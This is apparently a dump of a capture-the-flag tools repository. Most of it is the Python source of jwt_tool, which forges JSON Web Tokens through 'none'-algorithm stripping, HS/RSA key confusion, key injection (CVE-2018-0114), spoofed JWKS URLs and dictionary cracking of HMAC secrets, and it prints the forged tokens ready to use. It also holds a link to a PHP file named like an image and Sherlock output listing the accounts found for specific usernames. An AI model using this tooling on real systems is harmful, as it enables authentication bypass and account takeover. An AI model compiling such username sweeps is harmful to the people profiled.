comparestamps, expiredtoken = dissectPayl(paylDict, count=True) 731 | i = 0 732 | paylList = [0] 733 | for pair in paylDict: 734 | menuNum = i+1 735 | paylList.append(pair) 736 | i += 1 737 | print("["+str(i+1)+"] *ADD A VALUE*") 738 | print("["+str(i+2)+"] *DELETE A 
VALUE*") 739 | if len(comparestamps) > 0: 740 | print("["+str(i+3)+"] *UPDATE TIMESTAMPS*") 741 | print("[0] Continue to next step") 742 | selection = "" 743 | print("\nPlease select a field number:\n(or 0 to Continue)") 744 | try: 745 | selection = int(input("> ")) 746 | except: 747 | print("Invalid selection") 748 | exit(1) 749 | if selection0: 750 | print("\nCurrent value of "+paylList[selection]+" is: "+str(paylDict[paylList[selection]])) 751 | print("Please enter new value and hit ENTER") 752 | newVal = input("> ") 753 | paylDict[paylList[selection]] = newVal 754 | elif selection == i+1: 755 | print("Please enter new Key and hit ENTER") 756 | newPair = input("> ") 757 | print("Please enter new value for "+newPair+" and hit ENTER") 758 | newVal = input("> ") 759 | try: 760 | newVal = int(newVal) 761 | except: 762 | pass 763 | paylList.append(newPair) 764 | paylDict[paylList[selection]] = newVal 765 | elif selection == i+2: 766 | print("Please select a Key to DELETE and hit ENTER") 767 | i = 0 768 | for pair in paylDict: 769 | menuNum = i+1 770 | print("["+str(menuNum)+"] "+pair+" = "+str(paylDict[pair])) 771 | paylList.append(pair) 772 | i += 1 773 | delPair = eval(input("> ")) 774 | del paylDict[paylList[delPair]] 775 | elif selection == i+3: 776 | print("Timestamp updating:") 777 | print("[1] Update earliest timestamp to current time (keeping offsets)") 778 | print("[2] Add 1 hour to timestamps") 779 | print("[3] Add 1 day to timestamps") 780 | print("[4] Remove 1 hour from timestamps") 781 | print("[5] Remove 1 day from timestamps") 782 | print("\nPlease select an option from above (1-5):") 783 | try: 784 | selection = int(input("> ")) 785 | except: 786 | print("Invalid selection") 787 | exit(1) 788 | if selection == 1: 789 | nowtime = int(datetime.datetime.now().timestamp()) 790 | timecomp = {} 791 | for timestamp in comparestamps: 792 | timecomp[timestamp] = paylDict[timestamp] 793 | earliest = min(timecomp, key=timecomp.get) 794 | earlytime = 
paylDict[earliest] 795 | for timestamp in comparestamps: 796 | if timestamp == earliest: 797 | paylDict[timestamp] = nowtime 798 | else: 799 | difftime = int(paylDict[timestamp])-int(earlytime) 800 | paylDict[timestamp] = nowtime+difftime 801 | elif selection == 2: 802 | for timestamp in comparestamps: 803 | newVal = int(paylDict[timestamp])+3600 804 | paylDict[timestamp] = newVal 805 | elif selection == 3: 806 | for timestamp in comparestamps: 807 | newVal = int(paylDict[timestamp])+86400 808 | paylDict[timestamp] = newVal 809 | elif selection == 4: 810 | for timestamp in comparestamps: 811 | newVal = int(paylDict[timestamp])-3600 812 | paylDict[timestamp] = newVal 813 | elif selection == 5: 814 | for timestamp in comparestamps: 815 | newVal = int(paylDict[timestamp])-86400 816 | paylDict[timestamp] = newVal 817 | else: 818 | print("Invalid selection") 819 | exit(1) 820 | elif selection == 0: 821 | break 822 | else: 823 | exit(1) 824 | print("\nToken Signing:") 825 | print("[1] Sign token with known HMAC-SHA 'secret'") 826 | print("[2] Sign token with RSA/ECDSA Private Key") 827 | print("[3] Strip signature using the \"none\" algorithm") 828 | print("[4] Sign with HS/RSA key confusion vulnerability") 829 | print("[5] Sign token with key file") 830 | print("[6] Inject a key and self-sign the token (CVE-2018-0114)") 831 | print("[7] Self-sign the token and export an external JWKS") 832 | print("[8] Keep original signature") 833 | print("\nPlease select an option from above (1-5):") 834 | try: 835 | selection = int(input("> ")) 836 | except: 837 | print("Invalid selection") 838 | exit(1) 839 | if selection == 1: 840 | print("\nPlease enter the known key:") 841 | key = input("> ") 842 | print("\nPlease enter the keylength:") 843 | print("[1] HMAC-SHA256") 844 | print("[2] HMAC-SHA384") 845 | print("[3] HMAC-SHA512") 846 | try: 847 | selLength = int(input("> ")) 848 | except: 849 | print("Invalid selection") 850 | exit(1) 851 | if selLength == 1: 852 | keyLength = 256 
853 | elif selLength == 2: 854 | keyLength = 384 855 | elif selLength == 3: 856 | keyLength = 512 857 | else: 858 | print("Invalid selection") 859 | exit(1) 860 | newSig, badSig, newContents = signToken(headDict, paylDict, key, keyLength) 861 | print("\nYour new forged token:") 862 | print("[+] URL safe: "+newContents+"."+newSig) 863 | print("[+] Standard: "+newContents+"."+badSig+"\n") 864 | exit(1) 865 | if selection == 2: 866 | print("\nPlease select an option:") 867 | print("[1] RSA key signing") 868 | print("[2] ECDSA key signing") 869 | print("[3] PSS key signing") 870 | try: 871 | selLength = int(input("> ")) 872 | except: 873 | print("Invalid selection") 874 | exit(1) 875 | if selLength == 1: 876 | print("\nPlease select an option:") 877 | print("[1] Generate new RSA key pair") 878 | print("[2] Use existing RSA Private Key") 879 | try: 880 | selLength = int(input("> ")) 881 | except: 882 | print("Invalid selection") 883 | exit(1) 884 | if selLength == 1: 885 | nowtime = str(int(datetime.datetime.now().timestamp())) 886 | pubKey, privKey = newRSAKeyPair() 887 | privKeyName = "private_jwttool_RSA_"+nowtime+".pem" 888 | pubKeyName = "public_jwttool_RSA_"+nowtime+".pem" 889 | with open(privKeyName, 'w') as test_priv_out: 890 | test_priv_out.write(privKey.decode()) 891 | with open(pubKeyName, 'w') as test_pub_out: 892 | test_pub_out.write(pubKey.decode()) 893 | print("\nKey pair created and exported as:\n"+pubKeyName+"\n"+privKeyName+"\n") 894 | elif selLength == 2: 895 | print("\nPlease enter the filename of the RSA Private Key:") 896 | privKeyName = input("> ") 897 | else: 898 | print("Invalid selection") 899 | exit(1) 900 | print("\nPlease enter the keylength:") 901 | print("[1] RSA-256") 902 | print("[2] RSA-384") 903 | print("[3] RSA-512") 904 | try: 905 | selLength = int(input("> ")) 906 | except: 907 | print("Invalid selection") 908 | exit(1) 909 | if selLength == 1: 910 | keyLength = 256 911 | elif selLength == 2: 912 | keyLength = 384 913 | elif 
selLength == 3: 914 | keyLength = 512 915 | else: 916 | print("Invalid selection") 917 | exit(1) 918 | newSig, badSig, newContents = signTokenRSA(headDict, paylDict, privKeyName, keyLength) 919 | print("\nYour new forged token:") 920 | print("[+] URL safe: "+newContents+"."+newSig) 921 | print("[+] Standard: "+newContents+"."+badSig+"\n") 922 | exit(1) 923 | elif selLength == 2: 924 | print("\nPlease select an option:") 925 | print("[1] Generate new ECDSA key pair") 926 | print("[2] Use existing ECDSA Private Key") 927 | try: 928 | selLength = int(input("> ")) 929 | except: 930 | print("Invalid selection") 931 | exit(1) 932 | if selLength == 1: 933 | nowtime = str(int(datetime.datetime.now().timestamp())) 934 | pubKey, privKey = newECKeyPair() 935 | privKeyName = "private_jwttool_EC_"+nowtime+".pem" 936 | pubKeyName = "public_jwttool_EC_"+nowtime+".pem" 937 | with open(privKeyName, 'w') as test_priv_out: 938 | test_priv_out.write(privKey) 939 | with open(pubKeyName, 'w') as test_pub_out: 940 | test_pub_out.write(pubKey) 941 | print("\nKey pair created and exported as:\n"+pubKeyName+"\n"+privKeyName+"\n") 942 | elif selLength == 2: 943 | print("\nPlease enter the filename of the ECDSA Private Key:") 944 | privKeyName = input("> ") 945 | else: 946 | print("Invalid selection") 947 | exit(1) 948 | print("\nPlease enter the keylength:") 949 | print("[1] ECDSA-256") 950 | print("[2] ECDSA-384") 951 | print("[3] ECDSA-512") 952 | try: 953 | selLength = int(input("> ")) 954 | except: 955 | print("Invalid selection") 956 | exit(1) 957 | if selLength == 1: 958 | keyLength = 256 959 | elif selLength == 2: 960 | keyLength = 384 961 | elif selLength == 3: 962 | keyLength = 512 963 | else: 964 | print("Invalid selection") 965 | exit(1) 966 | newSig, badSig, newContents = signTokenEC(headDict, paylDict, privKeyName, keyLength) 967 | print("\nYour new forged token:") 968 | print("[+] URL safe: "+newContents+"."+newSig) 969 | print("[+] Standard: "+newContents+"."+badSig+"\n") 970 
| exit(1) 971 | elif selLength == 3: 972 | print("\nPlease select an option:") 973 | print("[1] Generate new RSA key pair") 974 | print("[2] Use existing RSA Private Key") 975 | try: 976 | selLength = int(input("> ")) 977 | except: 978 | print("Invalid selection") 979 | exit(1) 980 | if selLength == 1: 981 | nowtime = str(int(datetime.datetime.now().timestamp())) 982 | pubKey, privKey = newRSAKeyPair() 983 | privKeyName = "private_jwttool_RSA_"+nowtime+".pem" 984 | pubKeyName = "public_jwttool_RSA_"+nowtime+".pem" 985 | with open(privKeyName, 'w') as test_priv_out: 986 | test_priv_out.write(privKey.decode()) 987 | with open(pubKeyName, 'w') as test_pub_out: 988 | test_pub_out.write(pubKey.decode()) 989 | print("\nKey pair created and exported as:\n"+pubKeyName+"\n"+privKeyName+"\n") 990 | elif selLength == 2: 991 | print("\nPlease enter the filename of the RSA Private Key:") 992 | privKeyName = input("> ") 993 | else: 994 | print("Invalid selection") 995 | exit(1) 996 | print("\nPlease enter the keylength:") 997 | print("[1] RSA-256") 998 | print("[2] RSA-384") 999 | print("[3] RSA-512") 1000 | try: 1001 | selLength = int(input("> ")) 1002 | except: 1003 | print("Invalid selection") 1004 | exit(1) 1005 | if selLength == 1: 1006 | keyLength = 256 1007 | elif selLength == 2: 1008 | keyLength = 384 1009 | elif selLength == 3: 1010 | keyLength = 512 1011 | else: 1012 | print("Invalid selection") 1013 | exit(1) 1014 | newSig, badSig, newContents = signTokenPSS(headDict, paylDict, privKeyName, keyLength) 1015 | print("\nYour new forged token:") 1016 | print("[+] URL safe: "+newContents+"."+newSig) 1017 | print("[+] Standard: "+newContents+"."+badSig+"\n") 1018 | exit(1) 1019 | else: 1020 | print("Invalid selection") 1021 | exit(1) 1022 | elif selection == 3: 1023 | print("\nStripped Signature") 1024 | tok2 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1025 | checkAlgNone(headDict, tok2) 1026 | exit(1) 1027 | 
elif selection == 4: 1028 | tok2 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1029 | try: 1030 | checkPubKey(headDict, tok2, pubKey) 1031 | except: 1032 | print("\nPlease enter the Public Key filename:") 1033 | pubKey = input("> ") 1034 | checkPubKey(headDict, tok2, pubKey) 1035 | exit(1) 1036 | if selection == 5: 1037 | print("\nPlease enter the key file's filename:") 1038 | keyFile = input("> ") 1039 | print("\nLoading key file...") 1040 | try: 1041 | key1 = open(keyFile).read() 1042 | except: 1043 | print("Could not load file") 1044 | exit(1) 1045 | print("File loaded: "+keyFile) 1046 | print("\nPlease enter the keylength:") 1047 | print("[1] HMAC-SHA256") 1048 | print("[2] HMAC-SHA384") 1049 | print("[3] HMAC-SHA512") 1050 | try: 1051 | selLength = int(input("> ")) 1052 | except: 1053 | print("Invalid selection") 1054 | exit(1) 1055 | if selLength == 1: 1056 | keyLength = 256 1057 | elif selLength == 2: 1058 | keyLength = 384 1059 | elif selLength == 3: 1060 | keyLength = 512 1061 | else: 1062 | print("Invalid selection") 1063 | exit(1) 1064 | newSig, badSig, newContents = signToken(headDict, paylDict, key1, keyLength) 1065 | print("\nYour new forged token:") 1066 | print("[+] URL safe: "+newContents+"."+newSig) 1067 | print("[+] Standard: "+newContents+"."+badSig+"\n") 1068 | exit(1) 1069 | elif selection == 6: 1070 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1071 | newSig, badSig, newContents = jwksEmbed(headDict, paylDict) 1072 | print("\nYour new forged token:") 1073 | print("[+] "+newContents+"."+sig) 1074 | exit(1) 1075 | elif selection == 7: 1076 | print("\nPlease select an option:") 1077 | print("[1] Generate new RSA key pair") 1078 | print("[2] Use existing RSA Private Key") 1079 | try: 1080 | selLength = 
def dissectPayl(paylDict, count=False):
    """Print every claim in a JWT payload dictionary.

    Timestamp claims ("exp", "nbf", "iat") are additionally decoded into a
    human-readable UTC time.  When ``count`` is True each claim is prefixed
    with its ordinal number (used by the tampering menu); otherwise a "+"
    placeholder is printed.

    Returns:
        (comparestamps, expiredtoken) where ``comparestamps`` is the list of
        timestamp claim names encountered (in payload order) and
        ``expiredtoken`` is True when the "exp" claim is in the past.
    """
    comparestamps = []
    expiredtoken = False
    nowtime = int(datetime.datetime.now().timestamp())
    for position, claim in enumerate(paylDict, start=1):
        placeholder = str(position) if count else "+"
        if claim in ("exp", "nbf", "iat"):
            # Decode the numeric claim into a readable timestamp.
            timestamp = datetime.datetime.fromtimestamp(int(paylDict[claim]))
            if claim == "exp" and int(timestamp.timestamp()) < nowtime:
                expiredtoken = True
            print("["+placeholder+"] "+claim+" = "+str(paylDict[claim])+" ==> TIMESTAMP = "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC)")
            comparestamps.append(claim)
        else:
            print("["+placeholder+"] "+claim+" = "+str(paylDict[claim]))
    return comparestamps, expiredtoken

def validateToken():
    """Split the global ``jwt`` string into its dot-separated parts and decode them.

    Returns:
        (headDict, paylDict, sig, contents) — the decoded header and payload
        as OrderedDicts, the signature re-encoded as unpadded URL-safe
        base64, and ``contents``: the ``header.payload`` bytes the signature
        covers.

    Exits the program on any malformed token.
    """
    try:
        tok1, tok2, sig = jwt.split(".", 3)
        # Round-trip the signature through decode/encode so it is normalised
        # to unpadded URL-safe base64 regardless of how it arrived.
        sig = base64.urlsafe_b64encode(base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))).decode('UTF-8').strip("=")
        contents = (tok1 + "." + tok2).encode()
        head = base64.b64decode(tok1 + "=" * (-len(tok1) % 4))
        payl = base64.b64decode(tok2 + "=" * (-len(tok2) % 4))
        # OrderedDict preserves the original claim order so the token can be
        # re-encoded byte-compatibly later.
        headDict = json.loads(head, object_pairs_hook=OrderedDict)
        paylDict = json.loads(payl, object_pairs_hook=OrderedDict)
    except Exception:  # narrowed from a bare except: don't swallow SystemExit/KeyboardInterrupt
        print("Oh noes! Invalid token")
        exit(1)
    return headDict, paylDict, sig, contents

def exploreToken(headDict, paylDict):
    """Print advisory notes for commonly-exploitable claims found in the token."""
    print("\n=====================\nExamine Token Values:\n=====================")
    claims = 0
    for claim in headDict:
        if claim == "jku":
            print("\n[+] jku: The 'JWKS URL' claim in the header is used to define the location of a JWKS file - a JSON file that stores signing key data. The main vulnerabilities here are:\n [*] the JWKS could contain private key data\n [*] the URL could be tampered with to point to a malicious JWKS\n [*] tampering a URL could force a lookup, leading to SSRF conditions")
            claims += 1
        elif claim == "kid":
            print("\n[+] kid: The 'key ID' claim in the header identifies the key used for signing the token. This could be a key stored in a JWKS file at an externally-accessible URL (especially one named in a 'jku' claim), a similarly-named public key on the server's file system, a JWKS file on the server's file system, or within a JWKS file somewhere accessible only to the server. The main vulnerabilities here are tampering the value to:\n [*] prompt verbose errors\n [*] redirect to an alternative internal file to use for signing\n [*] perform command injection\n [*] perform other injection attacks")
            claims += 1
        elif claim == "x5u":
            print("\n[+] x5u: The 'x509 Certificate URL' claim in the header is used to define the location of an x509 Certificate, used to sign the token - usually stored within a JWKS file that stores signing key data. The main vulnerabilities here are:\n [*] the x509 could contain sensitive data\n[*] the URL could be tampered with to point to a malicious x509 Certificate\n [*] tampering a URL could force a lookup, leading to SSRF conditions")
            claims += 1
    for claim in paylDict:
        if claim == "iss":
            print("\n[+] iss: The 'issuer' claim in the payload is used to define the 'principal' that issued the JWT. The main vulnerabilities here are:\n [*] a URL that reveals sensitive data.\n [*] tampering a URL could force a lookup, leading to SSRF conditions")
            claims += 1
    if claims == 0:
        print("\nNo commonly-known vulnerable claims identified.\n")

def rejigToken(headDict, paylDict, sig):
    """Pretty-print the decoded token and the offsets between its timestamp
    claims; returns the three inputs unchanged."""
    print("\n=====================\nDecoded Token Values:\n=====================")
    print("\nToken header values:")
    for claim in headDict:
        if isinstance(headDict[claim], dict):
            print("[+] "+claim+" = JSON object:")
            for subclaim in headDict[claim]:
                print(" [+] "+subclaim+" = "+str(headDict[claim][subclaim]))
        else:
            print("[+] "+claim+" = "+str(headDict[claim]))
    print("\nToken payload values:")
    comparestamps, expiredtoken = dissectPayl(paylDict)
    if len(comparestamps) >= 2:
        # Report every timestamp claim relative to the first one seen.
        print("\nSeen timestamps:")
        print("[*] "+comparestamps[0]+" was seen")
        for claim in comparestamps:
            timeoff = int(paylDict[claim]) - int(paylDict[comparestamps[0]])
            if timeoff != 0:
                if timeoff < 0:
                    timeoff = -timeoff
                    prepost = "[-] "+claim+" is earlier than "+comparestamps[0]+" by: "
                else:
                    prepost = "[+] "+claim+" is later than "+comparestamps[0]+" by: "
                # divmod replaces the original str()/float()/int() round-trips.
                days, remainder = divmod(timeoff, 86400)
                hours, remainder = divmod(remainder, 3600)
                mins = remainder // 60
                print(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins")
    if expiredtoken:
        print("[-] TOKEN IS EXPIRED!")
    print("\n----------------------\nJWT common timestamps:\niat = IssuedAt\nexp = Expires\nnbf = NotBefore\n----------------------")
    return headDict, paylDict, sig

if __name__ == '__main__':
    # Print logo
    print()
    print(" $$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$$\ $$\ ")
    print(" \__$$ |$$ | $\ $$ |\__$$ __| \__$$ __| $$ |")
    print(" $$ |$$ |$$$\ $$ | $$ | $$ | $$$$$$\ $$$$$$\ $$ |")
    print(" $$ |$$ $$ $$\$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ |")
    print("$$\ $$ |$$$$ _$$$$ | $$ | $$ |$$ / $$ |$$ / $$ |$$ |")
    print("$$ | $$ |$$$ / \$$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ |")
    print("\$$$$$$ |$$ / \$$ | $$ | $$ |\$$$$$$ |\$$$$$$ |$$ |")
    print(" \______/ \__/ \__| \__|$$$$$$\\__| \______/ \______/ \__|")
    print(" Version 1.3.2 \______| ")
    print()

    parser = argparse.ArgumentParser(epilog="If you don't have a token, try this one:\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po", formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("jwt", type=str,
                        help="the JWT to tinker with")
    parser.add_argument("-R", "--readtoken", action="store_true",
                        help="read and analyse JWT contents")
    parser.add_argument("-X", "--explore", action="store_true",
                        help="eXplore the potential issues with a token")
    parser.add_argument("-T", "--tamper", action="store_true",
                        help="tamper with the JWT contents")
    parser.add_argument("-C", "--crack", action="store_true",
                        help="crack key for an HMAC-SHA token")
    parser.add_argument("-J", "--jwkscheck", action="store_true",
                        help="validate and process a JWKS file")
    parser.add_argument("-A", "--algnone", action="store_true",
                        help="EXPLOIT: test the \"alg\": \"none\" vulnerability")
    parser.add_argument("-K", "--keyconf", action="store_true",
                        help="EXPLOIT: test the HMAC-SHA/RSA key confusion vulnerability")
    parser.add_argument("-I", "--injectjwk", action="store_true",
                        help="EXPLOIT: inject a key and self-sign the token (CVE-2018-0114)")
    parser.add_argument("-S", "--spoofjwk", action="store_true",
                        help="EXPLOIT: self-sign a key and output a JWKS ")
    parser.add_argument("-V", "--verify", action="store_true",
                        help="verify the RSA signature against a Public Key")
    parser.add_argument("-d", "--dict", action="store",
                        help="dictionary file for cracking")
    parser.add_argument("-p", "--password", action="store",
                        help="password for cracking")
    parser.add_argument("-k", "--keyfile", action="store",
                        help="keyfile for cracking")
    parser.add_argument("-pk", "--pubkey", action="store",
                        help="Public Key for Asymmetric crypto")
    parser.add_argument("-pr", "--privatekey", action="store",
                        help="Private Key for Asymmetric crypto")
    parser.add_argument("-jw", "--jwksfile", action="store",
                        help="JSON Web Key Store for Asymmetric crypto")
    parser.add_argument("-u", "--urlinject", action="store",
                        help="URL location where you can host a spoofed JWKS")
    args = parser.parse_args()
    jwt = args.jwt
    key = ""
    pubKey = ""
    privateKey = ""
    keyList = ""
    keyFile = ""
    jwksfile = ""
    urlinject = ""
    headDict, paylDict, sig, contents = validateToken()
    tok2 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    if args.dict:
        keyList = args.dict
    if args.keyfile:
        keyFile = args.keyfile
    if args.password:
        key = args.password
    if args.pubkey:
        pubKey = args.pubkey
    if args.privatekey:
        privateKey = args.privatekey
    if args.jwksfile:
        jwksfile = args.jwksfile
    if args.urlinject:
        urlinject = args.urlinject

    # menu from args
    if args.tamper:
        tamperToken(paylDict, headDict, sig)
        exit(1)
    if args.verify:
        algType = headDict["alg"][0:2]
        if algType == "RS":
            if pubKey:
                verifyTokenRSA(headDict, paylDict, sig, pubKey)
            else:
                print("No Public Key provided (-pk)\n")
                parser.print_usage()
            exit(1)
        elif algType == "ES":
            if pubKey:
                verifyTokenEC(headDict, paylDict, sig, pubKey)
            else:
                print("No Public Key provided (-pk)\n")
                parser.print_usage()
            exit(1)
        elif algType == "PS":
            if pubKey:
                verifyTokenPSS(headDict, paylDict, sig, pubKey)
            else:
                print("No Public Key provided (-pk)\n")
                parser.print_usage()
            exit(1)
        else:
            print("Algorithm not supported for verification")
            exit(1)
    if args.readtoken:
        rejigToken(headDict, paylDict, sig)
        exit(1)
    if args.explore:
        rejigToken(headDict, paylDict, sig)
        exploreToken(headDict, paylDict)
        exit(1)
    if args.jwkscheck:
        if jwksfile:
            parseJWKS(jwksfile)
        else:
            print("No JWKS file provided (-jw)\n")
            parser.print_usage()
        exit(1)
    if args.algnone:
        checkAlgNone(headDict, tok2)
        exit(1)
    if args.injectjwk:
        newSig, badSig, newContents = jwksEmbed(headDict, paylDict)
        print("[+] New injected token: "+newContents+"."+newSig)
        exit(1)
    if args.spoofjwk:
        if urlinject:
            jku = urlinject
            # A "kid" in the header must be carried into the spoofed JWKS so
            # the server matches our key; fall back to no kid when absent.
            try:
                kid = headDict["kid"]
                newSig, badSig, newContents, newjwks, privKeyName, jwksName = jwksGen(headDict, paylDict, jku, privateKey, kid)
            except Exception:
                kid = ""
                newSig, badSig, newContents, newjwks, privKeyName, jwksName = jwksGen(headDict, paylDict, jku, privateKey)
            print("\nYour new forged token:")
            print("(Signed with: "+privKeyName+")")
            print("[+] "+newContents+"."+newSig)
            print("\nPaste this JWKS into a new file at the following location: "+jku)
            print("(Also exported as: "+jwksName+")")
            print("[+]\n"+str(newjwks))
            exit(1)
        else:
            print("No URL provided to spoof the JWKS (-u)\n")
            parser.print_usage()
            exit(1)
    if args.keyconf:
        if pubKey:
            checkPubKey(headDict, tok2, pubKey)
        else:
            print("No Public Key provided (-pk)\n")
            parser.print_usage()
        exit(1)
    if args.crack:
        if args.password:
            print("Password provided, checking if valid...")
            checkSig(sig, contents, key)
        elif args.dict:
            crackSig(sig, contents)
        elif args.keyfile:
            checkSigKid(sig, contents)
        else:
            print("No cracking option supplied:\nPlease specify a password/dictionary/Public Key\n")
            parser.print_usage()
        exit(1)

    # Show token deconstructed
    rejigToken(headDict, paylDict, sig)
    # Main menu
    print("\n\n########################################################")
    print("# Options: #")
    print("# ==== TAMPERING ==== #")
    print("# 1: Tamper with JWT data (multiple signing options) #")
    print("# #")
    print("# ==== VULNERABILITIES ==== #")
    print("# 2: Check for the \"none\" algorithm vulnerability #")
    print("# 3: Check for HS/RSA key confusion vulnerability #")
    print("# 4: Check for JWKS key injection vulnerability #")
    print("# #")
    print("# ==== CRACKING/GUESSING ==== #")
    print("# 5: Check HS signature against a key (password) #")
    print("# 6: Check HS signature against key file #")
    print("# 7: Crack signature with supplied dictionary file #")
    print("# #")
    print("# ==== RSA KEY FUNCTIONS ==== #")
    print("# 8: Verify RSA signature against a Public Key #")
    print("# #")
    print("# 0: Quit #")
    print("########################################################")
    # Fixed prompt: the menu offers options 0-8, not 1-6.
    print("\nPlease make a selection (0-8)")
    try:
        selection = int(input("> "))
    except Exception:
        print("Invalid selection")
        exit(1)
    if selection == 1:
        tamperToken(paylDict, headDict, sig)
    elif selection == 2:
        checkAlgNone(headDict, tok2)
    elif selection == 3:
        if not pubKey:
            print("\nPlease enter the Public Key filename:")
            pubKey = input("> ")
        checkPubKey(headDict, tok2, pubKey)
    elif selection == 4:
        newSig, badSig, newContents = jwksEmbed(headDict, paylDict)
        print("[+] New injected token: "+newContents+"."+newSig)
    elif selection == 5:
        checkSig(sig, contents, key)
    elif selection == 6:
        if keyFile != "":
            checkSigKid(sig, contents)
        else:
            print("Please provide filename for key file.\n")
            keyFile = input("> ")
            checkSigKid(sig, contents)
    elif selection == 7:
        if keyList != "":
            crackSig(sig, contents)
        else:
            print("Please provide filename for dictionary file.\n")
            keyList = input("> ")
            crackSig(sig, contents)
    elif selection == 8:
        algType = headDict["alg"][0:2]
        # Bug fix: the original referenced an undefined `pubKeyName` here and
        # relied on the resulting NameError being caught to prompt the user.
        # Seed it from the -pk argument; verification failure still reprompts.
        pubKeyName = pubKey
        if algType == "RS":
            try:
                verifyTokenRSA(headDict, paylDict, sig, pubKeyName)
            except Exception:
                print("Please provide filename for Public Key.\n")
                pubKeyName = input("> ")
                verifyTokenRSA(headDict, paylDict, sig, pubKeyName)
        elif algType == "ES":
            try:
                verifyTokenEC(headDict, paylDict, sig, pubKeyName)
            except Exception:
                print("Please provide filename for Public Key.\n")
                pubKeyName = input("> ")
                verifyTokenEC(headDict, paylDict, sig, pubKeyName)
        else:
            print("Algorithm not supported for verification")
            exit(1)
    else:
        exit(1)
    exit(1)
https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/pupper.jpg.php -------------------------------------------------------------------------------- /sherlock/.dockerignore: -------------------------------------------------------------------------------- 1 | .git/ 2 | .vscode/ 3 | screenshot/ 4 | tests/ 5 | *.txt 6 | !/requirements.txt -------------------------------------------------------------------------------- /sherlock/.travis.yml: -------------------------------------------------------------------------------- 1 | group: travis_latest 2 | language: python 3 | cache: pip 4 | matrix: 5 | allow_failures: 6 | - python: nightly 7 | - name: "Sherlock Site Coverage Tests" 8 | fast_finish: true 9 | include: 10 | - python: 3.6 11 | - python: 3.7 12 | - python: 3.8 13 | - python: nightly 14 | - python: 3.7 15 | before_script: true # override the flake8 tests 16 | name: "Sherlock Site Coverage Tests" 17 | script: python -m unittest tests.all.SherlockSiteCoverageTests --buffer --verbose 18 | install: 19 | - pip install flake8 -r requirements.txt 20 | before_script: 21 | # stop the build if there are Python syntax errors or undefined names 22 | - flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics 23 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 24 | - flake8 . 
--count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 25 | script: 26 | - python -m unittest tests.all.SherlockDetectTests --buffer --verbose || true 27 | notifications: 28 | on_success: change 29 | on_failure: change # `always` will be the setting once code changes slow down 30 | -------------------------------------------------------------------------------- /sherlock/Alpha-maniak.txt: -------------------------------------------------------------------------------- 1 | https://cash.me/$Alpha-maniak 2 | https://fortnitetracker.com/profile/all/Alpha-maniak 3 | https://www.gpsies.com/mapUser.do?username=Alpha-maniak 4 | http://Alpha-maniak.insanejournal.com/profile 5 | https://www.meetme.com/Alpha-maniak 6 | https://yandex.ru/collections/user/Alpha-maniak/ 7 | https://bbs.boingboing.net/u/Alpha-maniak 8 | https://elwo.ru/index/8-0-Alpha-maniak 9 | https://www.opennet.ru/~Alpha-maniak 10 | http://pedsovet.su/index/8-0-Alpha-maniak 11 | https://radioskot.ru/index/8-0-Alpha-maniak 12 | Total Websites Username Detected On : 11 -------------------------------------------------------------------------------- /sherlock/AlphaManiak.txt: -------------------------------------------------------------------------------- 1 | https://cash.me/$AlphaManiak 2 | https://www.duolingo.com/profile/AlphaManiak 3 | https://www.ebay.com/usr/AlphaManiak 4 | https://www.facebook.com/AlphaManiak 5 | https://fortnitetracker.com/profile/all/AlphaManiak 6 | https://www.gpsies.com/mapUser.do?username=AlphaManiak 7 | http://AlphaManiak.insanejournal.com/profile 8 | https://www.instagram.com/AlphaManiak 9 | https://www.meetme.com/AlphaManiak 10 | https://www.pinterest.com/AlphaManiak/ 11 | https://www.reddit.com/user/AlphaManiak 12 | https://www.roblox.com/user.aspx?username=AlphaManiak 13 | https://soundcloud.com/AlphaManiak 14 | https://t.me/AlphaManiak 15 | https://www.twitter.com/AlphaManiak 16 | https://yandex.ru/collections/user/AlphaManiak/ 17 | 
https://bbs.boingboing.net/u/AlphaManiak 18 | https://last.fm/user/AlphaManiak 19 | Total Websites Username Detected On : 18 -------------------------------------------------------------------------------- /sherlock/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any 
